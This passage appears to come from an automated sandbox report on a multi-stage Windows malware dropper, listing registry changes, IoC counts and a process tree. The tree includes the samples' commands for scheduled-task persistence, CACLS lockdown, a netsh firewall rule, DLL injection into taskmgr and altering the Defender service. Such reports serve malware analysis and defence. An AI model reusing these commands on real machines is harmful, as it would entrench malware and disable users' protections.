\REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e7094cced006da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content MicrosoftEdgeCP.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3Pp48oh.exeAppLaunch.exeExplorer.EXEpid process 4260 3Pp48oh.exe 4260 3Pp48oh.exe 3804 AppLaunch.exe 3804 AppLaunch.exe 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3260 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 608 -
Suspicious behavior: MapViewOfSection 26 IoCs
Processes:
3Pp48oh.exeMicrosoftEdgeCP.exetoolspub2.exepid process 4260 3Pp48oh.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe 5712 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AppLaunch.exeExplorer.EXEMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe8EC2.exedescription pid process Token: SeDebugPrivilege 3804 AppLaunch.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 964 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 1756 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1756 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE Token: SeDebugPrivilege 5152 8EC2.exe Token: SeShutdownPrivilege 3260 Explorer.EXE Token: SeCreatePagefilePrivilege 3260 Explorer.EXE -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
Explorer.EXEpid process 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE -
Suspicious use of SendNotifyMessage 45 IoCs
Processes:
Explorer.EXEpid process 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE 3260 Explorer.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepid process 3652 MicrosoftEdge.exe 4556 MicrosoftEdgeCP.exe 964 MicrosoftEdgeCP.exe 4556 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeYj1WX27.exevh4hc74.exenF6Lt05.exeTN7Pe86.exeVy4Zf18.exe1Iz10bE7.exe2Hu0424.exe4LF780EA.exe5Ny9PH9.exedescription pid process target process PID 680 wrote to memory of 520 680 file.exe Yj1WX27.exe PID 680 wrote to memory of 520 680 file.exe Yj1WX27.exe PID 680 wrote to memory of 520 680 file.exe Yj1WX27.exe PID 520 wrote to memory of 3444 520 Yj1WX27.exe vh4hc74.exe PID 520 wrote to memory of 3444 520 Yj1WX27.exe vh4hc74.exe PID 520 wrote to memory of 3444 520 Yj1WX27.exe vh4hc74.exe PID 3444 wrote to memory of 1344 3444 vh4hc74.exe nF6Lt05.exe PID 3444 wrote to memory of 1344 3444 vh4hc74.exe nF6Lt05.exe PID 3444 wrote to memory of 1344 3444 vh4hc74.exe nF6Lt05.exe PID 1344 wrote to memory of 2228 1344 nF6Lt05.exe TN7Pe86.exe PID 1344 wrote to memory of 2228 1344 nF6Lt05.exe TN7Pe86.exe PID 1344 wrote to memory of 2228 1344 nF6Lt05.exe TN7Pe86.exe PID 2228 wrote to memory of 2960 2228 TN7Pe86.exe Vy4Zf18.exe PID 2228 wrote to memory of 2960 2228 TN7Pe86.exe Vy4Zf18.exe PID 2228 wrote to memory of 2960 2228 TN7Pe86.exe Vy4Zf18.exe PID 2960 wrote to memory of 2996 2960 Vy4Zf18.exe 1Iz10bE7.exe PID 2960 wrote to memory of 2996 2960 Vy4Zf18.exe 1Iz10bE7.exe PID 2960 wrote to memory of 2996 2960 Vy4Zf18.exe 1Iz10bE7.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2996 wrote to memory of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2960 wrote to memory of 2544 2960 Vy4Zf18.exe 2Hu0424.exe PID 2960 wrote to memory of 2544 2960 Vy4Zf18.exe 2Hu0424.exe PID 2960 wrote to memory of 2544 2960 Vy4Zf18.exe 2Hu0424.exe PID 2544 wrote to memory of 940 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 940 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 940 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2544 wrote to memory of 3908 2544 2Hu0424.exe AppLaunch.exe PID 2228 wrote to memory of 4260 2228 TN7Pe86.exe 3Pp48oh.exe PID 2228 wrote to memory of 4260 2228 TN7Pe86.exe 3Pp48oh.exe PID 2228 wrote to memory of 4260 2228 TN7Pe86.exe 3Pp48oh.exe PID 1344 wrote to memory of 1012 1344 nF6Lt05.exe 4LF780EA.exe PID 1344 wrote to memory of 1012 1344 nF6Lt05.exe 4LF780EA.exe PID 1344 wrote to memory of 1012 1344 nF6Lt05.exe 4LF780EA.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 1012 wrote to memory of 3012 1012 4LF780EA.exe AppLaunch.exe PID 3444 wrote to memory of 5032 3444 vh4hc74.exe 5Ny9PH9.exe PID 3444 wrote to memory of 5032 3444 vh4hc74.exe 5Ny9PH9.exe PID 3444 wrote to memory of 5032 3444 vh4hc74.exe 5Ny9PH9.exe PID 5032 wrote to memory of 4224 5032 5Ny9PH9.exe explothe.exe PID 5032 wrote to memory of 4224 5032 5Ny9PH9.exe explothe.exe PID 5032 wrote to memory of 4224 5032 5Ny9PH9.exe explothe.exe PID 520 wrote to memory of 2320 520 Yj1WX27.exe 6Kg3IZ2.exe PID 520 wrote to memory of 2320 520 Yj1WX27.exe 6Kg3IZ2.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Yj1WX27.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Yj1WX27.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vh4hc74.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vh4hc74.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nF6Lt05.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nF6Lt05.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TN7Pe86.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TN7Pe86.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Vy4Zf18.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Vy4Zf18.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Iz10bE7.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Iz10bE7.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Hu0424.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Hu0424.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 56810⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Pp48oh.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Pp48oh.exe7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4LF780EA.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4LF780EA.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ny9PH9.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ny9PH9.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"8⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Kg3IZ2.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Kg3IZ2.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7HZ9qx58.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7HZ9qx58.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BFD.tmp\2BFE.tmp\2BFF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7HZ9qx58.exe"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\85F4.exeC:\Users\Admin\AppData\Local\Temp\85F4.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\PA3Ij9az.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\PA3Ij9az.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\yb9ls3GZ.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\yb9ls3GZ.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ye0fC7ZR.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ye0fC7ZR.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\SJ3EA0VH.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\SJ3EA0VH.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Xf60zx0.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1Xf60zx0.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 5809⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\2fr169sf.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\2fr169sf.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8AB8.exeC:\Users\Admin\AppData\Local\Temp\8AB8.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF1.bat" "2⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\8D1B.exeC:\Users\Admin\AppData\Local\Temp\8D1B.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8EC2.exeC:\Users\Admin\AppData\Local\Temp\8EC2.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\91EF.exeC:\Users\Admin\AppData\Local\Temp\91EF.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4449.exeC:\Users\Admin\AppData\Local\Temp\4449.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
